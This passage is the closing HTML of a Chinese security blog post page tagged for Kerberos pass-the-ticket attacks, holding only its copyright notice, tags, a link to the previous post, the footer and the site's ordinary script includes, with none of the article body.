</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:1916003479@qq.com">uf9n1x</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://uf9n1x.top/2023/04/25/nei-wang-shen-tou-jiu-kerberos-xie-yi-ptt-wei-pai-gong-ji/">https://uf9n1x.top/2023/04/25/nei-wang-shen-tou-jiu-kerberos-xie-yi-ptt-wei-pai-gong-ji/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://uf9n1x.top">Uf9n1x's Blog</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a><a class="post-meta__tags" href="/tags/Kerberos/">Kerberos</a><a class="post-meta__tags" href="/tags/PTT/">PTT</a></div><nav id="pagination"><div class="next-post pull-right"><a href="/2023/04/23/nei-wang-shen-tou-ba-heng-xiang-yi-bu-dong/"><span>内网渗透（八）横向移不动</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://blog-1313934826.cos.ap-chengdu.myqcloud.com/normal-images/psc.png#https://s1.ax1x.com/2023/04/14/p9Sd0ns.png)"><div class="layout" id="footer"><div class="copyright">&copy;2023 By uf9n1x</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="footer_custom_text">hitokoto</div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file-o"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/lib/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.1"></script><script src="/js/fancybox.js?version=1.9.1"></script><script src="/js/sidebar.js?version=1.9.1"></script><script src="/js/copy.js?version=1.9.1"></script><script src="/js/fireworks.js?version=1.9.1"></script><script src="/js/transition.js?version=1.9.1"></script><script src="/js/scroll.js?version=1.9.1"></script><script src="/js/head.js?version=1.9.1"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a target="_blank" rel="noopener" href="https://github.com/wzpan/hexo-generator-search" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>